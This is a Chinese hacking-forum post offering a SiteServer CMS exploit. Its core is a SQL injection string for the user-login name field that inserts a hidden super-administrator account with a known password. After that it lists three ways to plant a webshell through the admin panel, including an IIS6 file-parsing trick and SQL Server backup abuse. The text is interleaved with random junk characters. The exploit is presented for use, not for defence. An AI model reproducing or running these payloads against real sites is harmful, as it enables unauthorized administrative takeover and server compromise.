中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版) S+ p( k  u- m

( D# R( d% J, d3 ~stieserver官网:www.siteserver.cn
  y. e9 ~4 y, |5 k3 a3 P  [
- S3 b& Z/ w/ T% p
. T9 I) L: H9 J; N2 X; j. H! x& _+ r' i+ l
EXP:! h) F( g- g# r  a8 H( r  H) F
+ W9 N! N* `* Y! }
直接访问UserCenter/login.aspx
$ Y) o) i$ ?0 [% b$ `) j7 p6 o$ m2 z; U  E: e6 b4 e2 }
2 y  E7 n2 A, a- F  ]/ \: u
* y& E; O( A9 a
用户名处输入:
4 Q; O" f: R7 _$ |5 ]) u3 Z
5 V$ L% d6 {3 x9 Z) U6 K! R$ Z, ^123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--1 N8 ^; H5 A+ y3 }. C+ v9 |4 u1 D
* E+ \) s" \  w+ X

1 F% p4 [. J$ A9 ^( s
# P2 w( x1 k- ^, m" ~6 }9 b2 G" M密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
6 u6 F3 T0 Q. G! Z5 @$ ?5 S& Q# R

' E' ^8 o( Q: K9 V
" [; `# R. i7 k1 h  K0 O! M6 C7 Z8 c8 T2 p之后再访问后台SiteServer/login.aspx用插入的用户登陆
+ U) v6 @* f5 X/ B  l" l6 M6 d' p: i

8 n8 E9 V6 x$ T1 t/ f4 q
( Q' s( X3 ^, P- U# x0 r' a后台拿webshell的三种方法:- t  D: Z, Q/ J6 K+ v/ M- q

  k7 n4 w- [5 ?& {一、5 p* D- s3 C. h7 l: e6 I

$ u. k3 n2 F7 t- w# h+ p/ ~站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx; T2 X$ D$ V. n5 S

7 _2 K- p1 Y  K- H9 E  Y二、
9 c( ^& |2 _( e3 L- @3 u" L
/ z" F) O( l4 p& |成员权限-》添加用户-》用户名为:1.asp
2 X; C0 I: M( Z& I4 P' j/ u
) Q. g% t8 m7 ^) Thttp://127.0.0.1/usercenter/( t  h: q3 W2 M1 Q

, D# s4 K$ ]: A' D用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell; R5 d3 h4 Y. k1 |

# ^( D+ k: }; F; y. }(ps:后台添加用户时不会验证是否含有非法字符)
7 U8 ?; X1 [# _( t  O0 M2 k# E: j1 e6 z
三、
6 B% b% G* j+ p! H
! @, a: |- @3 D- }. a系统工具-》实用工具-》机器参数查看7 n8 O1 i6 b: k: A  o
可以看到数据库类型、名称,WEB路径
; \" V! Q; g2 K
, y8 g: w# p/ i. h- q系统工具-》数据库工具-》SQL语句查询
! D* {- c/ S, M" c/ N+ b! j- m这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
) d/ |3 O# S' J9 V+ [
3 N: _' j/ C6 ]  {2 t" p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2